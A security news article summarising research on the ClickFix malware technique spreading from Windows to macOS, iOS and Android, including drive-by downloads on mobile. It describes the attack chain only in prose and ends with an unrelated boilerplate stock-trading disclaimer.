Trending

ClickFix Unchained: Windows Hack Evolves to Target macOS, iOS, Android – Mobile Users Face Drive-By Danger!

Photo of Jonh Hisense Jonh Hisense2 weeks ago
2 minutes read

The notorious ClickFix hacking technique, infamous for duping users into installing malware by convincing them they’re fixing a computer issue, has undergone a significant and alarming evolution. Security experts have warned that this once Windows-exclusive threat now has macOS, iOS, and Android devices firmly in its crosshairs.

New research from cybersecurity firm c/side details this dangerous expansion, revealing a particularly troubling development for mobile users: on Android and iOS, the attack morphs into a stealthy drive-by attack, requiring no user interaction beyond visiting a compromised webpage.

How the Evolved ClickFix Attack Unfolds

In a blog post analyzing this evolution, c/side researchers explain that the new attack vector typically begins with a compromised website. Threat actors inject malicious JavaScript code into these sites. When an unsuspecting user clicks on certain elements on the page, they are silently redirected to a new browser tab.

This new tab cleverly masquerades as a legitimate URL shortener, displaying a message instructing the user to copy and paste a provided link into their browser. Following this instruction triggers yet another redirect, this time leading to a malicious download page.

From this point, the attack methodology diverges based on the victim’s operating system:

  • On macOS: The attack culminates in a terminal command that fetches and executes a malicious shell script. Worryingly, this script is already being flagged by multiple antivirus programs, indicating active malicious intent.

  • On Android and iOS – The Drive-By Menace: The situation becomes even more precarious for mobile users. “When we tested this on Android and iOS, we expected a ClickFix variant. But instead, we encountered a drive-by attack,” the c/side researchers explained.

    drive-by attack is a type of cyberattack where malicious code is downloaded and/or executed on a device simply by the user visiting a compromised or malicious webpage. No additional clicks, installs, or interactions are required from the victim. In this ClickFix variant, visiting the malicious site triggers the download of a .TAR archive file containing malware. This mobile malware payload has also been flagged by at least five different antivirus programs.

A “Fascinating and Evolving” Threat

The researchers at c/side highlight the significance of this development: “This is a fascinating and evolving attack that demonstrates how attackers are expanding their reach. What started as a Windows-specific ClickFix campaign is now targeting macOS, Android, and iOS, significantly expanding the scale of the operation.”

This evolution underscores the adaptability of cybercriminals and their continuous efforts to exploit new platforms and user behaviors. While the fact that the malware components are already being detected by antivirus solutions is a positive sign, the expansion to new operating systems and the shift to drive-by tactics on mobile devices represent a heightened risk for a much broader user base. Users are urged to maintain vigilance, ensure their security software is up-to-date, and exercise caution when browsing, especially if redirected unexpectedly.

Photo of Jonh Hisense Jonh Hisense2 weeks ago
2 minutes read
Disclaimer: This article is for informational and educational purposes only and is based on the analysis of a single image. It should not be considered financial or investment advice. Trading stocks involves significant risk, and you should always conduct your own thorough research and consult with a qualified financial advisor before making any investment decisions.
Photo of Jonh Hisense

Jonh Hisense

© Copyright 2025, All Rights Reserved
Back to top button
close